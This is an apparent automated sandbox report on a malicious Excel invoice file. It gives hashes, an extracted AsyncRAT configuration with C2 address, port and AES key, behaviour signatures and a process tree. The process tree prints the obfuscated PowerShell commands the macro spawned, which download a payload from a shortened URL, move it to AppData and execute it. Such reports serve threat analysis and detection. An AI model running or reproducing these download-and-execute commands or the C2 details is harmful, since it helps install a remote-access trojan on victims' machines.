Analysis
-
max time kernel
144s -
max time network
145s -
platform
windows10_x64 -
resource
win10 -
submitted
26-10-2020 09:06
Static task
static1
Behavioral task
behavioral1
Sample
Invoice 098734543 3.xls
Resource
win7
General
-
Target
Invoice 098734543 3.xls
-
Size
66KB
-
MD5
a86efdb09b8ec5a298f512459ff8d64d
-
SHA1
17a9506e70c78f7de865af5be040384997bba4cb
-
SHA256
71444376cd428f1934e94d2933197c4f0bfe03019b845a81fdeb922bcae95d7a
-
SHA512
b984f9b55e46861b6233b13e1e88200db7bd43c6c09d95ccd6bda6a189c6cd00b6a30dc94b574d9db0a2cb139ef2f5284ac7a84a580072575341187f225851f0
Malware Config
Extracted
https://tinyurl.com/y6ak9qcl
Extracted
asyncrat
0.5.7B
185.165.153.249:4371
AsyncMutex_6SI8OkPnk
-
aes_key
4lpLfCzV6wCkayaT0MjD3qp2ZVBd759O
-
anti_detection
false
-
autorun
false
-
bdos
false
-
delay
Default
-
host
185.165.153.249
-
hwid
3
- install_file
-
install_folder
%AppData%
-
mutex
AsyncMutex_6SI8OkPnk
-
pastebin_config
null
-
port
4371
-
version
0.5.7B
Signatures
-
Process spawned unexpected child process 3 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
cmd.execmd.execmd.exedescription pid pid_target process target process Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process 3628 4660 cmd.exe EXCEL.EXE Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process 3776 4660 cmd.exe EXCEL.EXE Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process 4240 4660 cmd.exe EXCEL.EXE -
ServiceHost packer 12 IoCs
Detects ServiceHost packer used for .NET malware
Processes:
resource yara_rule behavioral2/memory/1136-36-0x0000000000000000-mapping.dmp servicehost behavioral2/memory/1136-35-0x0000000000000000-mapping.dmp servicehost behavioral2/memory/1136-37-0x0000000000000000-mapping.dmp servicehost behavioral2/memory/1136-38-0x0000000000000000-mapping.dmp servicehost behavioral2/memory/1136-39-0x0000000000000000-mapping.dmp servicehost behavioral2/memory/1136-40-0x0000000000000000-mapping.dmp servicehost behavioral2/memory/1136-41-0x0000000000000000-mapping.dmp servicehost behavioral2/memory/1136-42-0x0000000000000000-mapping.dmp servicehost behavioral2/memory/1136-43-0x0000000000000000-mapping.dmp servicehost behavioral2/memory/1136-44-0x0000000000000000-mapping.dmp servicehost behavioral2/memory/1136-46-0x0000000000000000-mapping.dmp servicehost behavioral2/memory/1136-45-0x0000000000000000-mapping.dmp servicehost -
Blacklisted process makes network request 2 IoCs
Processes:
powershell.exeflow pid process 16 4124 powershell.exe 20 4124 powershell.exe -
Executes dropped EXE 2 IoCs
Processes:
ye.exeye.exepid process 1136 ye.exe 4568 ye.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 12 IoCs
Processes:
ye.exepid process 1136 ye.exe 1136 ye.exe 1136 ye.exe 1136 ye.exe 1136 ye.exe 1136 ye.exe 1136 ye.exe 1136 ye.exe 1136 ye.exe 1136 ye.exe 1136 ye.exe 1136 ye.exe -
Suspicious use of SetThreadContext 1 IoCs
Processes:
ye.exedescription pid process target process PID 1136 set thread context of 4568 1136 ye.exe ye.exe -
Program crash 1 IoCs
Processes:
WerFault.exepid pid_target process target process 2572 1136 WerFault.exe ye.exe -
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
EXCEL.EXEdescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString EXCEL.EXE -
Delays execution with timeout.exe 1 IoCs
Processes:
timeout.exepid process 1492 timeout.exe -
Enumerates system info in registry 2 TTPs 3 IoCs
Processes:
EXCEL.EXEdescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU EXCEL.EXE -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
Processes:
EXCEL.EXEpid process 4660 EXCEL.EXE -
Suspicious behavior: EnumeratesProcesses 27 IoCs
Processes:
powershell.exepowershell.exepowershell.exeye.exeWerFault.exepid process 4124 powershell.exe 4112 powershell.exe 3172 powershell.exe 4124 powershell.exe 4112 powershell.exe 4124 powershell.exe 4112 powershell.exe 3172 powershell.exe 3172 powershell.exe 1136 ye.exe 1136 ye.exe 1136 ye.exe 2572 WerFault.exe 2572 WerFault.exe 2572 WerFault.exe 2572 WerFault.exe 2572 WerFault.exe 2572 WerFault.exe 2572 WerFault.exe 2572 WerFault.exe 2572 WerFault.exe 2572 WerFault.exe 2572 WerFault.exe 2572 WerFault.exe 2572 WerFault.exe 2572 WerFault.exe 2572 WerFault.exe -
Suspicious use of AdjustPrivilegeToken 7 IoCs
Processes:
powershell.exepowershell.exepowershell.exeye.exeWerFault.exedescription pid process Token: SeDebugPrivilege 4124 powershell.exe Token: SeDebugPrivilege 4112 powershell.exe Token: SeDebugPrivilege 3172 powershell.exe Token: SeDebugPrivilege 1136 ye.exe Token: SeRestorePrivilege 2572 WerFault.exe Token: SeBackupPrivilege 2572 WerFault.exe Token: SeDebugPrivilege 2572 WerFault.exe -
Suspicious use of SetWindowsHookEx 12 IoCs
Processes:
EXCEL.EXEpid process 4660 EXCEL.EXE 4660 EXCEL.EXE 4660 EXCEL.EXE 4660 EXCEL.EXE 4660 EXCEL.EXE 4660 EXCEL.EXE 4660 EXCEL.EXE 4660 EXCEL.EXE 4660 EXCEL.EXE 4660 EXCEL.EXE 4660 EXCEL.EXE 4660 EXCEL.EXE -
Suspicious use of WriteProcessMemory 26 IoCs
Processes:
EXCEL.EXEcmd.execmd.execmd.exepowershell.exeye.exedescription pid process target process PID 4660 wrote to memory of 3628 4660 EXCEL.EXE cmd.exe PID 4660 wrote to memory of 3628 4660 EXCEL.EXE cmd.exe PID 4660 wrote to memory of 3776 4660 EXCEL.EXE cmd.exe PID 4660 wrote to memory of 3776 4660 EXCEL.EXE cmd.exe PID 4660 wrote to memory of 4240 4660 EXCEL.EXE cmd.exe PID 4660 wrote to memory of 4240 4660 EXCEL.EXE cmd.exe PID 3628 wrote to memory of 4124 3628 cmd.exe powershell.exe PID 3628 wrote to memory of 4124 3628 cmd.exe powershell.exe PID 4240 wrote to memory of 4112 4240 cmd.exe powershell.exe PID 4240 wrote to memory of 4112 4240 cmd.exe powershell.exe PID 3776 wrote to memory of 3172 3776 cmd.exe powershell.exe PID 3776 wrote to memory of 3172 3776 cmd.exe powershell.exe PID 4112 wrote to memory of 1136 4112 powershell.exe ye.exe PID 4112 wrote to memory of 1136 4112 powershell.exe ye.exe PID 4112 wrote to memory of 1136 4112 powershell.exe ye.exe PID 1136 wrote to memory of 1492 1136 ye.exe timeout.exe PID 1136 wrote to memory of 1492 1136 ye.exe timeout.exe PID 1136 wrote to memory of 1492 1136 ye.exe timeout.exe PID 1136 wrote to memory of 4568 1136 ye.exe ye.exe PID 1136 wrote to memory of 4568 1136 ye.exe ye.exe PID 1136 wrote to memory of 4568 1136 ye.exe ye.exe PID 1136 wrote to memory of 4568 1136 ye.exe ye.exe PID 1136 wrote to memory of 4568 1136 ye.exe ye.exe PID 1136 wrote to memory of 4568 1136 ye.exe ye.exe PID 1136 wrote to memory of 4568 1136 ye.exe ye.exe PID 1136 wrote to memory of 4568 1136 ye.exe ye.exe
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\Invoice 098734543 3.xls"1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\SYSTEM32\cmd.execmd /k p^ower^shell -w 1 (nEw-oBje`cT Net.WebcL`IENt).('DownloadFile').Invoke(('ht'+'tps://tinyurl.com/y6ak9qcl'),'ye.exe')2⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -w 1 (nEw-oBje`cT Net.WebcL`IENt).('DownloadFile').Invoke(('ht'+'tps://tinyurl.com/y6ak9qcl'),'ye.exe')3⤵
- Blacklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SYSTEM32\cmd.execmd /k p^ower^shell -w 1 stARt`-slE`Ep 20; Move-Item "ye.exe" -Destination "$env:appdata"2⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -w 1 stARt`-slE`Ep 20; Move-Item "ye.exe" -Destination "$env:appdata"3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SYSTEM32\cmd.execmd /k po^wer^shell -w 1 stARt`-slE`Ep 25; cd $env:appdata; ./ye.exe2⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -w 1 stARt`-slE`Ep 25; cd $env:appdata; ./ye.exe3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Roaming\ye.exe"C:\Users\Admin\AppData\Roaming\ye.exe"4⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\timeout.exetimeout5⤵
- Delays execution with timeout.exe
-
C:\Users\Admin\AppData\Roaming\ye.exe"C:\Users\Admin\AppData\Roaming\ye.exe"5⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1136 -s 17205⤵
- Program crash
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.logMD5
d737fc27bbf2f3bd19d1706af83dbe3f
SHA1212d219394124968b50769c371121a577d973985
SHA256b96b55a2acd9c790092e8132b31e5f0110492f98828098112d46f2f9faa2b982
SHA512974c2db081dd6d1f45763371c41e01173b189ea1a2d893d0bc415670bfa12f3934ba9dea64018b8c063017454d4d92888d6fe6eaad1659e420ba9adcde5e788b
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveMD5
488f69042a436bd6fb05af90e635a6b9
SHA10441e50fe8cad913f12a7b520da367f8014e17ff
SHA256f39ed7bbab3606c71c91058334a8f9f8b6884a67483e73a09e41d60a2ea98d80
SHA512f2379fcef57310282746d5f8590e01bab373d8c8b666d8222dad267d12e7a506035212a2437d88973f5b5e13606b2c80c749ba03becb6871f868c25280d883f6
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveMD5
0c1c62bfca7af8d857af7e6b147ede67
SHA1e126c9ecd0486e3073009fb9480e02b27b21e394
SHA256975afd5a68dc63afb61006a0599d8e9e183e9439548749d3dd5645379c0d6106
SHA512148365943b464770d555dcc48de009173d3ae0a8fe42c2d2f66fd20f3ebd172402d61979418279a463e8644e68f590620838f080f2d10c95ed479dcc30a99f8b
-
C:\Users\Admin\AppData\Roaming\ye.exeMD5
ae77db4c78360750c5b01b15d8453913
SHA1e165beb3ad5d55ada5941d21a7d1d0b0472c27cd
SHA25654747f101ba51f7364f85105375eb872927e2ec2414fd6fa32dc4797b4eb6e8e
SHA5127911de411042cf339c81f0b0d3f315787445645beaed3d7a0d404a621a0bf3f99faf18f9e4a6b47162de3ae12a3326bdc70ab9f73c746e2649fca712d4852d73
-
C:\Users\Admin\AppData\Roaming\ye.exeMD5
ae77db4c78360750c5b01b15d8453913
SHA1e165beb3ad5d55ada5941d21a7d1d0b0472c27cd
SHA25654747f101ba51f7364f85105375eb872927e2ec2414fd6fa32dc4797b4eb6e8e
SHA5127911de411042cf339c81f0b0d3f315787445645beaed3d7a0d404a621a0bf3f99faf18f9e4a6b47162de3ae12a3326bdc70ab9f73c746e2649fca712d4852d73
-
C:\Users\Admin\Documents\ye.exeMD5
ae77db4c78360750c5b01b15d8453913
SHA1e165beb3ad5d55ada5941d21a7d1d0b0472c27cd
SHA25654747f101ba51f7364f85105375eb872927e2ec2414fd6fa32dc4797b4eb6e8e
SHA5127911de411042cf339c81f0b0d3f315787445645beaed3d7a0d404a621a0bf3f99faf18f9e4a6b47162de3ae12a3326bdc70ab9f73c746e2649fca712d4852d73
-
memory/1136-35-0x0000000000000000-mapping.dmp
-
memory/1136-37-0x0000000000000000-mapping.dmp
-
memory/1136-45-0x0000000000000000-mapping.dmp
-
memory/1136-46-0x0000000000000000-mapping.dmp
-
memory/1136-44-0x0000000000000000-mapping.dmp
-
memory/1136-43-0x0000000000000000-mapping.dmp
-
memory/1136-42-0x0000000000000000-mapping.dmp
-
memory/1136-41-0x0000000000000000-mapping.dmp
-
memory/1136-40-0x0000000000000000-mapping.dmp
-
memory/1136-39-0x0000000000000000-mapping.dmp
-
memory/1136-19-0x0000000000000000-mapping.dmp
-
memory/1136-38-0x0000000000000000-mapping.dmp
-
memory/1136-22-0x0000000073CC0000-0x00000000743AE000-memory.dmpFilesize
6.9MB
-
memory/1136-23-0x0000000000900000-0x0000000000901000-memory.dmpFilesize
4KB
-
memory/1136-24-0x0000000005590000-0x0000000005591000-memory.dmpFilesize
4KB
-
memory/1136-25-0x0000000005170000-0x0000000005171000-memory.dmpFilesize
4KB
-
memory/1136-36-0x0000000000000000-mapping.dmp
-
memory/1136-27-0x0000000006080000-0x000000000609A000-memory.dmpFilesize
104KB
-
memory/1492-26-0x0000000000000000-mapping.dmp
-
memory/2572-47-0x0000000004D90000-0x0000000004D91000-memory.dmpFilesize
4KB
-
memory/2572-34-0x0000000004750000-0x0000000004751000-memory.dmpFilesize
4KB
-
memory/3172-8-0x0000000000000000-mapping.dmp
-
memory/3172-10-0x00007FF877650000-0x00007FF87803C000-memory.dmpFilesize
9.9MB
-
memory/3628-1-0x0000000000000000-mapping.dmp
-
memory/3776-2-0x0000000000000000-mapping.dmp
-
memory/4112-6-0x0000000000000000-mapping.dmp
-
memory/4112-7-0x00007FF877650000-0x00007FF87803C000-memory.dmpFilesize
9.9MB
-
memory/4112-13-0x000001C8D63F0000-0x000001C8D63F1000-memory.dmpFilesize
4KB
-
memory/4124-5-0x00007FF877650000-0x00007FF87803C000-memory.dmpFilesize
9.9MB
-
memory/4124-4-0x0000000000000000-mapping.dmp
-
memory/4124-9-0x000002255B080000-0x000002255B081000-memory.dmpFilesize
4KB
-
memory/4240-3-0x0000000000000000-mapping.dmp
-
memory/4568-28-0x0000000000400000-0x0000000000412000-memory.dmpFilesize
72KB
-
memory/4568-31-0x0000000073CC0000-0x00000000743AE000-memory.dmpFilesize
6.9MB
-
memory/4568-29-0x000000000040D06E-mapping.dmp
-
memory/4660-0-0x00007FF87F650000-0x00007FF87FC87000-memory.dmpFilesize
6.2MB